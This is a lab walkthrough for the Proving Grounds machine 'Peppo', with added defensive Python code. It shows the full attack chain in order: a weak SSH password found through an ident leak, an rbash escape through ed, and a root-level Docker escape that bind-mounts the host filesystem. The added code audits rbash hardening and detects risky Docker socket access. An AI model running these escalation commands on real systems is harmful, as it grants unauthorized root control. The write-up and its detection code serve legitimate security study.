Peppo
Exploitation Guide for Peppo | Proving Grounds
We will get the initial shell with the help of an exposed username and a weak credential, then perform a Docker escape to get the root shell.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/peppo/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
53/tcp closed domain
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| Fpostmaster.c
| L2071
|_ RProcessStartupPacket
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
|_http-title: Redmine
10000/tcp open snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 27 Aug 2021 04:57:47 GMT
| Connection: close
| Hello World
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 27 Aug 2021 04:57:36 GMT
| Connection: close
|_ Hello World
As you can see, the Ident service exposed a possible username, eleanor. The HTTP service is just a rabbit hole: we can log in with the credential admin:admin, but that won't take us anywhere. Just log in to SSH with the credential eleanor:eleanor.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/peppo/scans]
└─$ ssh eleanor@192.168.136.60
eleanor@192.168.136.60's password:
Linux peppo 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 27 04:42:09 2021 from 192.168.49.136
We will need to escape the current shell, as it is a restricted rbash. Use ed and input !'/bin/bash' to get out of the restricted shell. Then add /usr/bin to the PATH variable to use the common Linux utilities.
eleanor@peppo:~$ ed
!'/bin/bash'
eleanor@peppo:~$ export PATH=$PATH:/usr/bin
eleanor@peppo:~$ head local.txt
8321a<REDACTED>99dcef9
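The rbash escape above works because the restricted account's PATH still offers a tool (ed) that can run an arbitrary command. As an added example, not part of this guide, the following Python audit checks the two things a hardened rbash account needs: a login shell of /bin/rbash, and a PATH made of a single root-owned, non-writable directory that contains no tool able to edit files or spawn a shell. The passwd text, directory listings and modes in the sample run are constructed; the tool list is illustrative rather than exhaustive.

```python
import os
import stat

# Illustrative, not exhaustive: tools that can edit files or hand out an
# unrestricted shell (the ed escape shown on the page is one instance) and
# so do not belong in the PATH of an rbash account.
SHELL_ESCAPE_TOOLS = frozenset({
    "ed", "ex", "vi", "vim", "less", "more", "man",
    "awk", "find", "perl", "python", "python3",
})


def login_shell(passwd_text, user):
    """Return the login shell recorded for `user` in passwd-format text, or None."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[0] == user:
            return fields[6]
    return None


def audit_restricted_path(path_value, listing, dir_stats):
    """Check the PATH a restricted user is given against minimum rbash hardening.

    path_value: the PATH string (e.g. from the account's .bash_profile)
    listing:    {directory: [entry names]}
    dir_stats:  {directory: (st_mode, st_uid)}
    Returns a list of human-readable findings; an empty list means nothing found.
    """
    findings = []
    dirs = [d for d in path_value.split(":") if d]
    if len(dirs) != 1:
        findings.append(
            f"PATH has {len(dirs)} entries; a restricted account should get "
            "exactly one dedicated directory")
    for d in dirs:
        mode, owner = dir_stats.get(d, (None, None))
        if mode is None:
            findings.append(f"{d}: directory does not exist")
            continue
        # The user must not be able to drop new binaries or symlinks into PATH.
        if owner != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{d}: must be root-owned and not group/world writable")
        escapes = sorted(set(listing.get(d, ())) & SHELL_ESCAPE_TOOLS)
        if escapes:
            findings.append(
                f"{d}: contains shell-escape capable tools: {', '.join(escapes)}")
    return findings


def gather_from_filesystem(path_value):
    """Collect `listing` and `dir_stats` for audit_restricted_path from the live system."""
    listing, dir_stats = {}, {}
    for d in path_value.split(":"):
        if d and os.path.isdir(d):
            st = os.stat(d)
            dir_stats[d] = (st.st_mode, st.st_uid)
            listing[d] = os.listdir(d)
    return listing, dir_stats


if __name__ == "__main__":
    # Constructed sample data, not taken from the Peppo machine.
    passwd = ("root:x:0:0:root:/root:/bin/bash\n"
              "eleanor:x:1000:1000::/home/eleanor:/bin/rbash\n")
    print("login shell:", login_shell(passwd, "eleanor"))
    sample_listing = {"/home/eleanor/bin": ["ls", "cat", "ed"]}
    sample_stats = {"/home/eleanor/bin": (0o040755, 0)}
    for finding in audit_restricted_path("/home/eleanor/bin", sample_listing, sample_stats):
        print("finding:", finding)
```

Run it against a live account with `gather_from_filesystem(path_value)` feeding `audit_restricted_path`. Even a clean result only means the obvious escapes are absent: rbash drops its restrictions for any shell script it executes and for any program that can itself exec a command, so it is a speed bump, not a security boundary, and should not stand in for proper account isolation.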
Run linpeas to find the privilege escalation vector. You can see that we have permission to write to the Docker socket.
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)
Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)
Write access to the Docker socket lets us start a container that bind-mounts the host's root filesystem and chroot into it. Just run the following command and we will be root.
eleanor@peppo:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it redmine chroot /host /bin/bash
root@41a1201fe6a9:/# ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
root@41a1201fe6a9:/# whoami
root
root@41a1201fe6a9:/# id
uid=0(root) gid=0(root) groups=0(root)
root@41a1201fe6a9:/# pwd
/
root@41a1201fe6a9:/# cd root
root@41a1201fe6a9:/root# ls
proof.txt
root@41a1201fe6a9:/root# cat proof.txt
57fc<REDACTED>9c80
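The session above is the consequence of one condition: an unprivileged user who can write to the Docker socket controls the Docker daemon, which runs as root. As an added example that is not part of this guide, the Python code below implements the same permission check linpeas reports (the POSIX owner/group/other logic the kernel applies) and a detection helper that flags `docker run` invocations bind-mounting sensitive host paths such as `/`, the mount the page uses. The socket modes, ids and argv in the sample run are constructed; the live wrapper reads /var/run/docker.sock, the path named on the page.

```python
import os
import stat

DOCKER_SOCKET = "/var/run/docker.sock"

# Host paths that, bind-mounted into a container, hand the container control
# of the host (the page mounts "/" itself).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")


def user_can_write(mode, owner_uid, owner_gid, uid, gids):
    """POSIX DAC write check as the kernel applies it.

    Exactly one permission class applies: owner bits when the uid matches,
    otherwise group bits when the file's gid is among the caller's groups,
    otherwise the "other" bits. uid 0 bypasses DAC entirely.
    """
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in set(gids):
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def socket_findings(mode, owner_uid, owner_gid, uid, gids):
    """Findings for a given user's access to the Docker socket."""
    findings = []
    if not stat.S_ISSOCK(mode):
        findings.append("path is not a unix socket (Docker may not be listening here)")
    if uid != 0 and user_can_write(mode, owner_uid, owner_gid, uid, gids):
        findings.append(f"uid {uid} can write to the Docker socket: equivalent to root on the host")
    if mode & stat.S_IWOTH:
        findings.append("socket is world-writable")
    return findings


def audit_live_socket(path=DOCKER_SOCKET):
    """Run socket_findings against the real socket for the calling user."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: not found"]
    gids = [os.getgid(), *os.getgroups()]
    return socket_findings(st.st_mode, st.st_uid, st.st_gid, os.getuid(), gids)


def host_bind_mounts(argv):
    """Host source paths named by -v/--volume/--mount in a `docker run` argv.

    Named volumes (no leading slash) are not host bind mounts and are skipped.
    """
    sources = []
    args = list(argv)
    i = 0
    while i < len(args):
        arg, spec = args[i], None
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(args):
            i += 1
            spec = args[i]
        elif arg.startswith(("--volume=", "--mount=")):
            spec = arg.split("=", 1)[1]
        if spec is not None:
            if "=" in spec:  # --mount type=bind,source=/,target=/host
                kv = dict(p.split("=", 1) for p in spec.split(",") if "=" in p)
                src = kv.get("source", kv.get("src", ""))
            else:            # -v /host/path:/container/path[:opts]
                src = spec.split(":", 1)[0]
            if src.startswith("/"):
                sources.append(os.path.normpath(src))
        i += 1
    return sources


def risky_bind_mounts(argv):
    """Subset of host_bind_mounts that expose a sensitive host path."""
    return [src for src in host_bind_mounts(argv)
            if src == "/" or any(src == p or src.startswith(p + "/")
                                 for p in SENSITIVE_HOST_PATHS if p != "/")]


if __name__ == "__main__":
    # Constructed values: a root:docker 0660 socket and a user in the docker group.
    print(socket_findings(stat.S_IFSOCK | 0o660, 0, 999, 1000, [1000, 999]))
    print(risky_bind_mounts(["docker", "-H", "unix:///var/run/docker.sock", "run",
                             "-v", "/:/host", "-it", "redmine", "chroot", "/host", "/bin/bash"]))
    print(audit_live_socket())
```

The remediation is to treat docker group membership exactly like sudo without a password: remove users who do not need it, and where a service account must keep access, record every use with an auditd watch (`-w /var/run/docker.sock -p wa -k docker-sock`) so that socket writes and container launches with host bind mounts are visible to the SOC.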